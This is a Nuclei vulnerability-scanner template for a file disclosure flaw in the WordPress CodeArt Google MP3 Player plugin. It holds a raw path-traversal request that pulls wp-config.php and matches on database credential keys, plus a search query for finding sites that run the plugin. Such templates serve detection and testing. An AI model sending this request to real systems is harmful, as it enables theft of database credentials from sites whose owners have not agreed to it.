nuclei-templates/http/vulnerabilities/wordpress/wp-googlemp3-lfi.yaml

44 lines
1.3 KiB
YAML
Raw Normal View History

2023-10-17 07:20:28 +00:00
id: wp-googlemp3-lfi
info:
name: WordPress Plugin CodeArt Google MP3 Player - File Disclosure Download
author: theamanrawat
severity: critical
description: |
WordPress Plugin CodeArt Google MP3 Player allows an unauthenticated attacker to download file from server.
reference:
- https://www.exploit-db.com/exploits/35460
- https://wordpress.org/plugins/google-mp3-audio-player/
metadata:
verified: "true"
max-request: 1
publicwww-query: "/wp-content/plugins/google-mp3-audio-player/"
tags: wp-plugin,wp,wordpress,lfi,google-mp3-audio-player,unauth,disclosure
http:
- raw:
- |
GET /wp-content/plugins/google-mp3-audio-player/direct_download.php?file=../../wp-config.php HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- "DB_USER"
- "DB_PASSWORD"
- "DB_HOST"
condition: and
- type: word
part: header
words:
- "application/octet-stream"
- type: status
status:
- 200
# digest: 4a0a004730450221008c610db40cc039edb35bcb96d13cc7266734a3597e6202fdc98309f3570a845e02201340968b65d7fba83ad5e4a80ffbe5b0193193f46f329d3b259c795f14eb7022:922c64590222798bb761d5b6d8e72950